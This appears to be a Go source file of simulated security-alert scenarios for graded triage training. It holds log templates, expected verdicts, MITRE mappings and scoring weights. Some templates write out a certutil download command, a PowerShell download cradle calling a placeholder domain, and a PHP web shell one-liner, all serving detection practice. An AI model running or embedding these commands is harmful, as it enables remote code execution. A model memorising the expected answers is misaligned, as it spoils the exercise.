		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1110", "T1078"},
		Keywords:      []string{"MFA", "fatigue", "push", "authentication", "bombardment"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "outbound-smtp-relay", Severity: "medium", Source: "firewall", Category: "malware",
		RuleTemplate: "{hostname} relaying spam via SMTP port 25 to {domain}",
		ScenarioTmpl: "{hostname} has established {count} outbound SMTP connections on port 25 in the past hour, which is not normal for a workstation. The emails appear to be spam with malicious links. This indicates the host is part of a spam botnet or has been compromised to relay phishing emails on behalf of the attacker.",
		LogTemplates: []LogTemplate{
			{"error", "{hostname} opened {count} outbound SMTP connections on port 25 in 1 hour"},
			{"warn", "SMTP relay destination: {domain} — not corporate mail server"},
			{"info", "Email headers show From: spoofed corporate domain, To: external targets"},
			{"warn", "Spam content: phishing links to {src_ip} embedded in HTML emails"},
			{"error", "Process: svchost.exe (suspicious instance) handling SMTP on {hostname}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1071", "T1566"},
		Keywords:      []string{"SMTP", "spam", "botnet", "relay", "phishing"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "cloud-bucket-public", Severity: "medium", Source: "cloudtrail", Category: "data-exfil",
		RuleTemplate: "S3 bucket made public by {username} via IAM — {count} objects exposed",
		ScenarioTmpl: "AWS CloudTrail recorded {username} modifying the ACL of an S3 bucket containing {count} objects, making it publicly accessible. The bucket name suggests it contains internal data (hr-records-prod). This may be accidental misconfiguration, but the sensitivity of the bucket requires immediate investigation and remediation.",
		LogTemplates: []LogTemplate{
			{"error", "CloudTrail: PutBucketAcl — bucket hr-records-prod set to public-read by {username}"},
			{"warn", "Bucket contents: {count} objects, includes PII and financial records"},
			{"info", "Change made via AWS Console from IP {src_ip} at 16:47 UTC"},
			{"warn", "No change request found for this bucket ACL modification"},
			{"error", "Public URL scan: {count} objects already indexed by search engines within 2h"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1530", "T1098"},
		Keywords:      []string{"S3", "public", "cloud", "misconfiguration", "exposure"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "lolbin-certutil", Severity: "medium", Source: "edr", Category: "malware",
		RuleTemplate: "certutil downloading payload from {domain} on {hostname}",
		ScenarioTmpl: "Windows certutil.exe was used by {username} on {hostname} to download a file from external URL {domain}. certutil is a legitimate Windows binary but is frequently abused to bypass web proxies and download malware. The downloaded file {filename} was then renamed and executed.",
		LogTemplates: []LogTemplate{
			{"error", "LOLBin: certutil.exe -urlcache -split -f http://{domain}/{hash} {filename} on {hostname}"},
			{"warn", "Downloaded file: {filename} (PE32 executable, unsigned) by certutil on {hostname}"},
			{"error", "{filename} renamed to svchost_{hash}.exe and executed by {username}"},
			{"info", "certutil used by {username} — not a system process invocation"},
			{"warn", "Proxy bypass: certutil bypassed web proxy filtering for {domain}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1105", "T1218"},
		Keywords:      []string{"certutil", "LOLBin", "download", "living off the land", "proxy bypass"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "svc-account-interactive", Severity: "medium", Source: "auth", Category: "privilege-escalation",
		RuleTemplate: "Service account {username} used for interactive login on {hostname}",
		ScenarioTmpl: "Service account {username} (configured for non-interactive use only) was used to establish an interactive RDP session on {hostname} from {src_ip}. Service accounts with elevated privileges should never be used interactively. This could indicate credential theft or an attacker using a compromised service account.",
		LogTemplates: []LogTemplate{
			{"error", "Interactive login by service account {username} on {hostname} — policy violation"},
			{"warn", "Logon type 10 (RemoteInteractive/RDP) for {username} from {src_ip}"},
			{"info", "Account policy: {username} should only logon as a service (type 5)"},
			{"warn", "Post-login: {username} accessed network shares and ran net commands"},
			{"error", "Service account {username} has Domain Admin membership — high risk"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1078"},
		Keywords:      []string{"service account", "interactive", "RDP", "privilege", "policy violation"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "anomalous-port-scan", Severity: "medium", Source: "ids", Category: "recon",
		RuleTemplate: "{hostname} scanning {count} ports on internal network from {src_ip}",
		ScenarioTmpl: "IDS detected {hostname} ({src_ip}) performing an internal port scan, probing {count} ports across the 10.0.0.0/8 subnet within 30 minutes. Nmap-style SYN scanning was detected. This behavior is atypical for a workstation. Could be authorized security scanning or malware performing network reconnaissance before lateral movement.",
		LogTemplates: []LogTemplate{
			{"error", "IDS: Port scan from {hostname} ({src_ip}) — {count} ports probed in 30 min"},
			{"warn", "Scan type: SYN scan (-sS) pattern — Nmap fingerprint detected"},
			{"warn", "Targets: 10.0.0.0/8 subnet — all internal hosts including DC, DB, file servers"},
			{"info", "No change ticket for authorized scan from {hostname}"},
			{"warn", "Sensitive ports targeted: 22, 23, 445, 1433, 3389, {port}"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1046"},
		Keywords:      []string{"port scan", "reconnaissance", "nmap", "internal network", "lateral"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "powershell-encoded", Severity: "medium", Source: "edr", Category: "malware",
		RuleTemplate: "Base64-encoded PowerShell command on {hostname} by {username}",
		ScenarioTmpl: "PowerShell was executed on {hostname} with the -EncodedCommand flag, passing a base64-encoded payload. Decoded content shows a download cradle attempting to reach {domain}. Encoded PowerShell is used by attackers to bypass command-line logging and obfuscate malicious intent.",
		LogTemplates: []LogTemplate{
			{"error", "PowerShell -EncodedCommand on {hostname} by {username} — obfuscation detected"},
			{"warn", "Base64 decoded: IEX(New-Object Net.WebClient).DownloadString('http://{domain}/p')"},
			{"error", "Script executed in-memory — no file dropped (fileless technique)"},
			{"warn", "AMSI bypass attempt detected before payload download on {hostname}"},
			{"info", "Parent: cmd.exe spawned powershell.exe with encoded command"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1059", "T1027"},
		Keywords:      []string{"PowerShell", "encoded", "base64", "obfuscation", "fileless"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "data-to-usb", Severity: "medium", Source: "edr", Category: "data-exfil",
		RuleTemplate: "{count}MB copied to USB device on {hostname} by {username}",
		ScenarioTmpl: "DLP detected {count}MB of data copied to a removable USB storage device on {hostname} by {username}. The files include documents matching sensitive data patterns. USB storage use is restricted by policy and this device is not in the approved device list. {username} has no business justification on file for USB usage.",
		LogTemplates: []LogTemplate{
			{"error", "DLP: {count}MB written to USB device on {hostname} by {username}"},
			{"warn", "USB device not in approved device whitelist (serial: {hash})"},
			{"error", "Files copied include: {filename}, client_list.csv — classification: CONFIDENTIAL"},
			{"warn", "Policy violation: USB storage restricted for {username}'s role"},
			{"info", "Device connected at 17:45, copy completed at 18:02 — {count}MB transferred"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1052"},
		Keywords:      []string{"USB", "removable", "data loss", "DLP", "exfiltration"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "web-shell-upload", Severity: "medium", Source: "ids", Category: "web-attack",
		RuleTemplate: "Web shell {filename} uploaded to web server {hostname}",
		ScenarioTmpl: "WAF and file integrity monitoring detected upload of a PHP web shell to {hostname} web root. The file '{filename}' contains eval(base64_decode()) pattern characteristic of web shells. The upload exploited an unrestricted file upload vulnerability. The web shell allows remote command execution on the web server.",
		LogTemplates: []LogTemplate{
			{"error", "WAF: Web shell upload detected — {filename} to /var/www/html/ on {hostname}"},
			{"error", "File content: <?php @eval(base64_decode($_POST['cmd'])); ?> — web shell signature"},
			{"warn", "Upload source: {src_ip} via multipart POST to /upload.php"},
			{"error", "FIM: {filename} created in web root outside deployment process"},
			{"warn", "Subsequent requests to /{filename}?cmd=id — command execution confirmed"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1505", "T1190"},
		Keywords:      []string{"web shell", "upload", "PHP", "remote code execution", "web server"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "cred-in-git", Severity: "medium", Source: "siem", Category: "data-exfil",
		RuleTemplate: "AWS credentials committed to git repository by {username}",
		ScenarioTmpl: "SIEM detected {username} committed AWS access keys (AKIA...) and a secret key to the company's GitHub repository. The commit was made to a public fork. Secret scanning bots have already detected the exposure. The credentials need immediate rotation. This is typically accidental but still a serious incident.",
		LogTemplates: []LogTemplate{
			{"error", "GitHub: AWS credentials detected in commit {hash} by {username}"},
			{"warn", "Credential pattern: AKIA[A-Z0-9]{16} found in config.py committed to public repo"},
			{"error", "Repo visibility: public — credentials indexed by GitHub secret scanning"},
			{"info", "Commit: 'fix: add missing config' — likely accidental inclusion"},
			{"warn", "AWS key age: 8 months — active key now exposed to internet"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1552"},
		Keywords:      []string{"credentials", "git", "AWS", "secret", "exposure"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "anomalous-after-hours", Severity: "medium", Source: "ueba", Category: "lateral-movement",
		RuleTemplate: "{username} accessing sensitive systems at 03:00 on {hostname}",
		ScenarioTmpl: "UEBA flagged {username} for accessing {count} sensitive internal systems between 02:45–04:20 UTC. This user's historical pattern shows no activity outside 08:00–18:00 in {count} months of baseline. The access includes HR database and finance servers. No after-hours work request on file.",
		LogTemplates: []LogTemplate{
			{"error", "UEBA: {username} active 02:45–04:20 UTC — 100% anomalous vs {count}-month baseline"},
			{"warn", "Systems accessed: SERVER-DB-01 (HR), FINANCE-01, DC-01 at 03:12 UTC"},
			{"info", "Access from {hostname} ({src_ip}) — {username}'s registered workstation"},
			{"warn", "Data accessed: {count} records from HR database at 03:18"},
			{"error", "UEBA risk score: 87/100 — after-hours + sensitive data + volume anomaly"},
		},
		ExpectedVerdict: "true_positive", ExpectedEscalation: "escalate",
		RequiredMITRE: []string{"T1078"},
		Keywords:      []string{"after hours", "anomalous", "UEBA", "sensitive", "baseline"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},

	// ── LOW (12) ──────────────────────────────────────────────────────────────
	{
		Key: "single-account-lockout", Severity: "low", Source: "auth", Category: "brute-force",
		RuleTemplate: "{username} account locked out — {count} failed attempts",
		ScenarioTmpl: "{username}'s account was locked after {count} failed password attempts in 3 minutes. The attempts came from {hostname} — the user's own workstation. No other accounts affected. This is consistent with a user forgetting their password or mistyping. No threat intel on the source.",
		LogTemplates: []LogTemplate{
			{"warn", "Account lockout: {username} after {count} failures from {hostname}"},
			{"info", "Lockout source: {hostname} — {username}'s registered workstation"},
			{"info", "Single account affected — not consistent with spray attack"},
			{"info", "User called helpdesk 5 min after lockout requesting reset"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1110"},
		Keywords:      []string{"lockout", "fat-finger", "single user", "helpdesk"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "internal-port-scan", Severity: "low", Source: "ids", Category: "recon",
		RuleTemplate: "Nmap scan detected from {hostname} — may be authorized",
		ScenarioTmpl: "IDS detected a port scan from {hostname} ({src_ip}) targeting internal hosts. The scan pattern matches Nmap default scan. There is an open change ticket for 'quarterly vulnerability assessment' assigned to the security team. The source host belongs to the security team based on asset inventory. Likely authorized activity.",
		LogTemplates: []LogTemplate{
			{"warn", "IDS: Nmap scan pattern from {hostname} ({src_ip}) — {count} hosts scanned"},
			{"info", "Source: {hostname} registered to security team (vulnerability scanning role)"},
			{"info", "Open ticket CHG-{count}: quarterly vuln scan scheduled this week"},
			{"info", "Scan limited to standard ports — not searching for exotic services"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1046"},
		Keywords:      []string{"authorized", "vulnerability scan", "security team", "false positive"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "failed-logins-threshold", Severity: "low", Source: "auth", Category: "brute-force",
		RuleTemplate: "{count} failed logins from {src_ip} — below lockout threshold",
		ScenarioTmpl: "{count} failed login attempts were recorded from {src_ip} against the web application login page. The attempts are below the account lockout threshold and spread across {count} minutes, suggesting slow probing. The IP is a residential address with no prior threat intel flags. Could be a user with forgotten credentials.",
		LogTemplates: []LogTemplate{
			{"warn", "{count} failed web app logins from {src_ip} in {count} min — below threshold"},
			{"info", "Source {src_ip}: residential IP, no threat intel flags, first seen today"},
			{"info", "Attempts spread over time — not automated spray pattern"},
			{"info", "Only {username} account targeted — consistent with user lockout scenario"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1110"},
		Keywords:      []string{"below threshold", "failed login", "residential", "not automated"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "software-unapproved", Severity: "low", Source: "edr", Category: "persistence",
		RuleTemplate: "Unapproved software installed on {hostname} by {username}",
		ScenarioTmpl: "Software asset management detected VLC Media Player installed on {hostname} by {username}. VLC is not on the approved software list. The installation appears to be for personal use (media player) and was done through normal installer channels. No malware indicators associated with this installation.",
		LogTemplates: []LogTemplate{
			{"warn", "Software install: VLC-3.0.20-win64.exe on {hostname} by {username}"},
			{"info", "Installer: legitimate signed package from videolan.org"},
			{"info", "Software not in approved list — policy violation but no malicious indicators"},
			{"info", "Installation method: standard NSIS installer, no elevation required"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1072"},
		Keywords:      []string{"unapproved", "policy violation", "no malware", "legitimate software"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "usb-connected-server", Severity: "low", Source: "edr", Category: "data-exfil",
		RuleTemplate: "USB device connected to production server {hostname}",
		ScenarioTmpl: "A USB storage device was connected to production server {hostname}. Servers should not have USB devices attached per policy. However, the data center access log shows a scheduled maintenance visit by the infrastructure team at that time. The device appears to be a USB keyboard for maintenance access, not storage.",
		LogTemplates: []LogTemplate{
			{"warn", "USB device connected to {hostname}: Vendor=HID, Type=Keyboard"},
			{"info", "Data center access log: infrastructure team maintenance visit at same time"},
			{"info", "USB class: HID (keyboard) — not mass storage device"},
			{"info", "No file transfer events detected from {hostname} after USB connection"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1052"},
		Keywords:      []string{"maintenance", "keyboard", "not storage", "authorized", "HID"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "temp-admin-granted", Severity: "low", Source: "auth", Category: "privilege-escalation",
		RuleTemplate: "Temporary admin rights granted to {username} via helpdesk ticket",
		ScenarioTmpl: "{username} was granted temporary local administrator rights on {hostname} for software installation. A helpdesk ticket HD-{count} documents the request and approval. The rights are time-limited to 4 hours. This is a standard supported workflow for managed devices. No other anomalies associated with this grant.",
		LogTemplates: []LogTemplate{
			{"info", "Admin grant: {username} added to local Administrators on {hostname} for 4h"},
			{"info", "Ticket HD-{count}: approved by IT manager — software installation request"},
			{"info", "Rights will auto-revoke at 17:00 UTC via PAM system"},
			{"info", "No anomalous activity detected during elevated session on {hostname}"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1098"},
		Keywords:      []string{"temporary", "helpdesk ticket", "authorized", "PAM", "time-limited"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "log-agent-stopped", Severity: "low", Source: "siem", Category: "persistence",
		RuleTemplate: "Security log agent stopped on {hostname} — single host",
		ScenarioTmpl: "The Splunk Universal Forwarder stopped on {hostname} at 09:32 UTC. SIEM lost visibility for this host for 22 minutes. The host is now back online with logs flowing. OS event logs show the stop was due to a Windows Update that required a service restart. No other indicators of tampering.",
		LogTemplates: []LogTemplate{
			{"warn", "SIEM: log agent stopped on {hostname} at 09:32 — visibility gap 22 min"},
			{"info", "Windows Update: KB5034441 installed on {hostname} at 09:28 (required restart)"},
			{"info", "Log agent restarted automatically at 09:54 — logs resumed"},
			{"info", "OS event log shows normal Windows Update sequence — no tampering"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1562"},
		Keywords:      []string{"Windows Update", "restart", "automatic", "single host", "resumed"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "cert-expiry-soon", Severity: "low", Source: "siem", Category: "compliance",
		RuleTemplate: "TLS certificate expiring in 14 days on {hostname}",
		ScenarioTmpl: "Automated certificate monitoring detected that the TLS certificate for {hostname} will expire in 14 days. This is an informational alert to prompt renewal. If the certificate expires, the service will become untrusted. No security incident — routine maintenance required. Ticket should be raised with the infrastructure team.",
		LogTemplates: []LogTemplate{
			{"warn", "Cert monitor: {hostname} certificate expires in 14 days (2026-07-09)"},
			{"info", "Certificate: CN={hostname}, issued by DigiCert, valid 90 days"},
			{"info", "Service affected: HTTPS on port 443 — web application"},
			{"info", "Action required: renew certificate and deploy before expiry"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{},
		Keywords:      []string{"certificate", "expiry", "renewal", "TLS", "maintenance"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "unusual-login-time", Severity: "low", Source: "auth", Category: "lateral-movement",
		RuleTemplate: "{username} logged in at unusual hour on {hostname}",
		ScenarioTmpl: "{username} logged into {hostname} at 22:15 local time, outside their normal 08:00–18:00 pattern. The login is from their registered workstation and home IP. {username} submitted an after-hours work request in the ticketing system 30 minutes earlier. The login appears legitimate.",
		LogTemplates: []LogTemplate{
			{"info", "Auth: {username} login at 22:15 from {hostname} — outside normal hours"},
			{"info", "Source: {hostname} registered to {username}, known home IP"},
			{"info", "After-hours request ticket: AHW-{count} approved at 21:45"},
			{"info", "Session: normal user activity — no privilege escalation or lateral movement"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1078"},
		Keywords:      []string{"after-hours ticket", "registered device", "legitimate", "approved"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "browser-extension-added", Severity: "low", Source: "edr", Category: "persistence",
		RuleTemplate: "Browser extension installed on {hostname} by {username}",
		ScenarioTmpl: "A browser extension 'Dark Reader v4.9.58' was installed on {hostname} by {username}. Dark Reader is a popular legitimate accessibility extension for eye strain. It is available on the Chrome Web Store and has 5 million users. No malicious indicators. This is a minor policy notification.",
		LogTemplates: []LogTemplate{
			{"info", "Chrome extension installed: 'Dark Reader' v4.9.58 by {username} on {hostname}"},
			{"info", "Extension source: Chrome Web Store (official), 5M+ users, 4.7 stars"},
			{"info", "Permissions: reading page content for dark mode rendering — expected"},
			{"info", "No malicious behavior indicators from extension on {hostname}"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1176"},
		Keywords:      []string{"legitimate extension", "Chrome Web Store", "accessibility", "no malware"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "nessus-scan-activity", Severity: "low", Source: "ids", Category: "recon",
		RuleTemplate: "Authorized Nessus scan from {src_ip} triggering IDS rules",
		ScenarioTmpl: "IDS rules are firing due to a Nessus vulnerability scan being performed from the security team's scanner ({src_ip}). The scan was authorized via change ticket CHG-{count} and is part of the monthly vulnerability management program. These alerts are expected and do not represent a threat.",
		LogTemplates: []LogTemplate{
			{"warn", "IDS: Multiple signatures triggered from {src_ip} — Nessus scan fingerprint"},
			{"info", "Scanner source: {src_ip} registered as Nessus scanner in asset inventory"},
			{"info", "Change ticket CHG-{count}: monthly vuln scan authorized, scope: all hosts"},
			{"info", "Alert volume matches expected Nessus plugin probe pattern — false positive"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1046"},
		Keywords:      []string{"Nessus", "authorized scan", "vulnerability management", "expected", "false positive"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "password-reset-bulk", Severity: "low", Source: "auth", Category: "brute-force",
		RuleTemplate: "Helpdesk bulk password reset for {count} accounts — verify authorization",
		ScenarioTmpl: "The helpdesk team performed a bulk password reset for {count} accounts. This was triggered by a reported phishing campaign where users may have entered credentials on a fake login page. The reset is a precautionary measure. Verify with helpdesk management that this reset was authorized and that all affected users were notified.",
		LogTemplates: []LogTemplate{
			{"warn", "Bulk password reset: {count} accounts reset by helpdesk admin {username}"},
			{"info", "Reason code: precautionary — phishing campaign reported by users"},
			{"info", "Reset performed via AD Users and Computers — standard process"},
			{"info", "Users notified via email with temporary passwords and MFA re-enrollment link"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1078"},
		Keywords:      []string{"authorized", "precautionary", "helpdesk", "phishing campaign", "bulk reset"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},

	// ── INFO (3) ──────────────────────────────────────────────────────────────
	{
		Key: "compliance-scan-done", Severity: "info", Source: "siem", Category: "compliance",
		RuleTemplate: "Weekly compliance scan completed — {count} findings on {hostname}",
		ScenarioTmpl: "The automated weekly CIS benchmark compliance scan completed successfully across {count} hosts. {count} total findings identified across all hosts, mostly low-severity misconfigurations. The report has been sent to the compliance team. No critical findings. Standard weekly report — no action required for SOC.",
		LogTemplates: []LogTemplate{
			{"info", "Compliance scan complete: {count} hosts scanned, {count} findings total"},
			{"info", "Critical findings: 0, High: {count}, Medium: {count}, Low: {count}"},
			{"info", "Report generated: compliance_{hash}.pdf sent to compliance@company.com"},
			{"info", "Benchmark: CIS Windows 11 Level 1 — {count}% compliance rate"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{},
		Keywords:      []string{"compliance", "automated scan", "report", "informational"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "backup-completed-warn", Severity: "info", Source: "siem", Category: "compliance",
		RuleTemplate: "Scheduled backup on {hostname} completed with {count} warnings",
		ScenarioTmpl: "The nightly backup job for {hostname} completed with {count} non-critical warnings. The warnings relate to open file locks on {count} files that could not be backed up while in use. This is expected behavior for active database files. The backup is otherwise complete and can be used for recovery.",
		LogTemplates: []LogTemplate{
			{"warn", "Backup job: {hostname} completed with {count} warnings — open file locks"},
			{"info", "Files skipped: {count} database files locked by SQL Server — expected"},
			{"info", "Backup size: {count}GB, completed in 2h 14min, stored to NAS-BACKUP-01"},
			{"info", "Recovery point created: {hostname}_{hash} — usable for restore"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{},
		Keywords:      []string{"backup", "expected warnings", "open files", "informational"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
	{
		Key: "network-topology-change", Severity: "info", Source: "ids", Category: "recon",
		RuleTemplate: "New device {src_ip} appeared on sensitive VLAN segment",
		ScenarioTmpl: "Network monitoring detected a new device at {src_ip} on the VLAN reserved for server infrastructure. The device has been assigned a DHCP lease and is generating network traffic. The infrastructure team should confirm whether this is a newly provisioned server or an unauthorized device joining the sensitive network segment.",
		LogTemplates: []LogTemplate{
			{"info", "New device discovered: {src_ip} on server VLAN (10.0.1.0/24)"},
			{"info", "DHCP lease assigned to {src_ip} — MAC: {hash}:aa:bb"},
			{"info", "Device traffic: standard ARP, DNS, HTTPS — no anomalous protocols"},
			{"info", "Check with infrastructure team: scheduled server provisioning this week?"},
		},
		ExpectedVerdict: "false_positive", ExpectedEscalation: "close",
		RequiredMITRE: []string{"T1016"},
		Keywords:      []string{"new device", "VLAN", "provisioning", "informational", "network"},
		ScoreBreakdown: LiveScore{Verdict: 40, Keywords: 30, MITRE: 20, Writeup: 10, Total: 100},
		DifficultyModifier: 1.0,
	},
}

// Parameter pools for random fill
var srcIPs = []string{
	"185.220.101.45", "185.233.102.47", "194.165.16.72", "91.108.4.111",
	"31.13.72.36", "45.142.212.100", "109.234.37.4", "194.26.29.18",
}

var internalIPs = []string{
	"10.0.1.55", "10.0.2.100", "10.0.3.77", "10.0.4.22",
	"192.168.1.45", "172.16.0.12", "10.0.1.200", "10.0.2.88",
}

var hostnames = []string{
	"WORKSTATION-01", "WORKSTATION-07", "WORKSTATION-12", "LAPTOP-HR-03",
	"LAPTOP-HR-07", "SERVER-FILE-01", "SERVER-DB-01", "LINUX-DEV-02",
	"LINUX-DEV-04", "DC-01", "MAIL-01", "WEB-01",
	"WORKSTATION-15", "LAPTOP-FIN-02", "SERVER-APP-01",
}

var usernames = []string{
	"jsmith", "awalker", "lperez", "mthompson", "jpark",
	"devuser", "svc_backup", "svc_monitor", "hradmin",
	"bwalker", "cjohnson", "tmiller", "rgarcia", "snguyen", "kchen",
}

var domains = []string{
	"corp-helpdesk.net", "update-service.xyz", "dl.bad-payload.ru",
	"secure-login.info", "microsoft-update.biz", "cdn-service.ru",
	"telemetry-check.com", "api-gateway.xyz",
}

var filenames = []string{
	"Q2_Report.xlsx", "salary_data.xlsx", "budget_2026.docx",
	"client_list.csv", "product_roadmap.pptx", "credentials.txt",
	"backup_keys.zip", "hr_database.sql",
}
